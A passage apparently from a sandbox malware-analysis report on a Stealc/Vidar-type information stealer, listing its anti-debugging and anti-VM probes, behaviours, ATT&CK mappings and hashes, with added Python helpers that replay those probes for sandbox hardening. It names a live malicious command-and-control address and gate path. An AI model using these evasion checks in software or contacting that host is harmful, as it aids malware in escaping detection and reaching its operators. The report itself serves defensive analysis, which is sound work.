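    "RDTSC instruction interceptor: First address: 748FB5 second address: 748FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBF78ADB276h 0x0000000a rdtsc",
    "RDTSC instruction interceptor: First address: 748FBF second address: 748FE9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF78E7B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FBF78E7B367h 0x00000010 jnl 00007FBF78E7B356h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc",
    "RDTSC instruction interceptor: First address: 757AEF second address: 757B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B366h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007FBF78E7B35Eh 0x00000011 js 00007FBF78E7B356h 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc",
    "RDTSC instruction interceptor: First address: 4DF031C second address: 4DF0374 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF78ADB27Fh 0x00000008 pushfd 0x00000009 jmp 00007FBF78ADB288h 0x0000000e sub esi, 130140D8h 0x00000014 jmp 00007FBF78ADB27Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FBF78ADB285h 0x00000025 rdtsc",
]

if __name__ == "__main__":
    for s in summarize(SAMPLE_LINES):
        print(s)
```

For a whole report, feed every line carrying the "RDTSC instruction interceptor" signature to summarize(). A run in which most pairs have a non-zero dead_bytes while executed stays small, and every conditional branch has a zero displacement, is the junk-padded timing check of a protector, not a compiler-emitted rdtsc; a consistent() result of False means the page's trace does not add up and the line should be re-read rather than trusted.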
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 501919 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 501884 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6ACE33 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6ABCD9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 737A2A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_002B38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002B4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002ADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_002ADA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002AE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_002AE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002AED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_002AED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_002B4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002ADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002ADE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002ABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_002ABE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_002B3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002AF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002AF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002A16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002A16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002A1160 GetSystemInfo,ExitProcess,0_2_002A1160
                Source: file.exe, file.exe, 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2223713103.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2223713103.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2223713103.0000000000D58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2223713103.0000000000D58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarev
                Source: file.exe, 00000000.00000002.2223713103.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~
                Source: file.exe, 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13648
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13651
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13671
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13703
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13663
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002A45C0 VirtualProtect ?,00000004,00000100,000000000_2_002A45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002B9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B9750 mov eax, dword ptr fs:[00000030h]0_2_002B9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_002B7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard
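The anti-VM and anti-debugging signatures above name exactly what the sample probes: three registry values, eight window class names or titles, three kernel-debugger device names, and the process DebugPort. The script below is an added example, not the sample's code and not Joe Sandbox's: it repeats those probes on an analysis VM so you can see which of them would fire before detonating a protected sample. evaluate() is the platform-independent decision logic over a snapshot; collect() runs the probes live and only works on Windows (winreg plus FindWindowW, CreateFileW and NtQueryInformationProcess through ctypes). The VM marker list extends the strings seen in the report ("VBOX__", "VMware", "Hyper-V") with "qemu" and "virtual" as an assumption, and both snapshot constants are constructed rather than captured.

```python
import ctypes
import sys

# Everything the sample was observed probing, copied from the report's signatures.
REGISTRY_PROBES = (  # (HKLM subkey, value name)
    (r"SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000", "DriverDesc"),
    (r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"),
    (r"HARDWARE\DESCRIPTION\System", "VideoBiosVersion"),
)
ANALYSIS_WINDOWS = (  # looked up both as a class name and as a title, as FindWindow allows
    "regmonclass", "gbdyllo", "process monitor - sysinternals: www.sysinternals.com",
    "procmon_window_class", "registry monitor - sysinternals: www.sysinternals.com",
    "ollydbg", "filemonclass", "file monitor - sysinternals: www.sysinternals.com",
)
DEBUGGER_DEVICES = ("NTICE", "SICE", "SIWVID")   # SoftICE-era kernel debugger devices
# "vbox", "vmware", "hyper-v" come from the report's memory strings; the last two are
# an assumption added here.
VM_MARKERS = ("vbox", "vmware", "hyper-v", "qemu", "virtual")


def evaluate(snapshot):
    """Pure decision logic: which of the sample's checks fire on this snapshot.

    snapshot = {"registry": {value_name: data}, "windows": [names found],
                "devices": [device names that could be opened], "debug_port": int}
    Returns (check, detail) tuples; an empty list means these probes see a clean host.
    """
    tripped = []
    for name, data in snapshot.get("registry", {}).items():
        text = " ".join(data) if isinstance(data, (list, tuple)) else str(data)  # REG_MULTI_SZ
        hits = [m for m in VM_MARKERS if m in text.lower()]
        if hits:
            tripped.append(("registry", f"{name}={text!r} matches {hits}"))
    for w in snapshot.get("windows", []):
        tripped.append(("window", w))
    for d in snapshot.get("devices", []):
        tripped.append(("device", rf"\\.\{d}"))
    if snapshot.get("debug_port"):
        tripped.append(("debug_port", hex(snapshot["debug_port"])))
    return tripped


def collect():
    """Run the same probes live. Windows only; elsewhere use evaluate() on a snapshot."""
    if sys.platform != "win32":
        raise RuntimeError("live collection needs Windows")
    import winreg
    reg = {}
    for subkey, value in REGISTRY_PROBES:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as k:
                reg[value] = winreg.QueryValueEx(k, value)[0]
        except OSError:
            reg[value] = ""
    user32, k32, ntdll = ctypes.windll.user32, ctypes.windll.kernel32, ctypes.windll.ntdll
    windows = [w for w in ANALYSIS_WINDOWS
               if user32.FindWindowW(w, None) or user32.FindWindowW(None, w)]
    k32.CreateFileW.restype = ctypes.c_void_p
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    invalid = ctypes.c_void_p(-1).value            # INVALID_HANDLE_VALUE
    devices = []
    for d in DEBUGGER_DEVICES:
        # GENERIC_READ, no sharing, OPEN_EXISTING: succeeds only if the driver is loaded
        h = k32.CreateFileW(rf"\\.\{d}", 0x80000000, 0, None, 3, 0, None)
        if h != invalid:
            k32.CloseHandle(h)
            devices.append(d)
    port = ctypes.c_void_p(0)
    ntdll.NtQueryInformationProcess(ctypes.c_void_p(-1), 7,          # 7 = ProcessDebugPort
                                    ctypes.byref(port), ctypes.sizeof(port), None)
    return {"registry": reg, "windows": windows, "devices": devices,
            "debug_port": port.value or 0}


# Constructed snapshots, not captured from a real machine.
CONSTRUCTED_VM_SNAPSHOT = {
    "registry": {"DriverDesc": "VirtualBox Graphics Adapter",
                 "SystemBiosVersion": ["VBOX   - 1"],
                 "VideoBiosVersion": "Oracle VM VirtualBox VBE Adapter"},
    "windows": ["procmon_window_class"], "devices": [], "debug_port": 0,
}
CONSTRUCTED_CLEAN_SNAPSHOT = {
    "registry": {"DriverDesc": "NVIDIA GeForce RTX 3060",
                 "SystemBiosVersion": ["LENOVO - 1"], "VideoBiosVersion": "Unknown"},
    "windows": [], "devices": [], "debug_port": 0,
}

if __name__ == "__main__":
    snap = collect() if sys.platform == "win32" else CONSTRUCTED_VM_SNAPSHOT
    for check, detail in evaluate(snap):
        print(f"{check:10s} {detail}")
```

Run collect() from an ordinary console on the sandbox image; each printed line is a check the sample makes that an unmodified guest will fail, so the fixes (renaming the Procmon window class, replacing the BIOS strings, detaching the debugger) can be verified against the same list before the next detonation.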

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1524, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_002B9600
                Source: file.exe, file.exe, 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_002B7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_002B6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_002B7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_002B7A30

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.file.exe.2a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2223713103.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2182199807.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1524, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara matchFile source: 0.2.file.exe.2a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2223713103.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2182199807.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1524, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                MITRE ATT&CK matrix (the number before a technique is the count of matched signatures; techniques without a number are the matrix's unmatched placeholder entries)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
file.exe | 47% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | Avira URL Cloud | malware
http://185.215.113.37/e2b1563c6670f193.phpm | 100% | Avira URL Cloud | malware
http://185.215.113.37/6122658-3693405117-2476756634-1003 | 100% | Avira URL Cloud | malware
http://185.215.113.37/ws | 100% | Avira URL Cloud | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | Avira URL Cloud | malware
http://185.215.113.37/3 | 100% | Avira URL Cloud | malware
http://185.215.113.37 | 100% | Avira URL Cloud | malware
http://185.215.113.37P | 0% | Avira URL Cloud | safe
http://185.215.113.37/e2b1563c6670f193.php14 | 100% | Avira URL Cloud | malware
http://185.215.113.37/e2b1563c6670f193.php7 | 100% | Avira URL Cloud | malware
http://185.215.113.37/e2b1563c6670f193.phpc | 100% | Avira URL Cloud | malware
http://185.215.113.37/e2b1563c6670f193.phpw | 100% | Avira URL Cloud | malware
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | Avira URL Cloud: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phpm | file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.37/6122658-3693405117-2476756634-1003 | file.exe, 00000000.00000002.2223713103.0000000000D82000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.37P | file.exe, 00000000.00000002.2223713103.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2223713103.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.37/3 | file.exe, 00000000.00000002.2223713103.0000000000D82000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php14 | file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpc | file.exe, 00000000.00000002.2223713103.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php7 | file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpw | file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1520353
                Start date and time:2024-09-27 08:39:12 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 56s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:5
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 92
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: file.exe
                No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz | 185.215.113.103
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                No context
                No context
                No created / dropped files found
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.949560132686486
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'843'200 bytes
                MD5:db555e4fdc380e9e8a19fcc609f7d1aa
                SHA1:be66e90a5d5ce54f1a90bd59a3b4723e1a53d89c
                SHA256:c1cd69890f1f81efd491b94bfff2d9e1263f4a843fc42b649aac082cf378f3a8
                SHA512:6c48434a9457204b2beaf6cbb6a3668af343a42e82d289acdb6bdf8c05f53fa518ba0b150a5afe45426c19d81b7d0deab42d08228b1d20ead7b213335cdec8db
                SSDEEP:24576:roVmZMpcU+BEtUBGZZUbjoWlvFHvK84tnFHQIrUDnQo9zbnva6+9UsefY:rlmpZUBAWjoWxRvYtFwQRY+9Useg
                TLSH:4B8533837F1991F9DC784F731CEEE953A3921581961817B24A1BBBFA4E3218BD499CC0
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........
                Icon Hash:00928e8e8686b000
                Entrypoint:0xa99000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b
                Instruction
                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
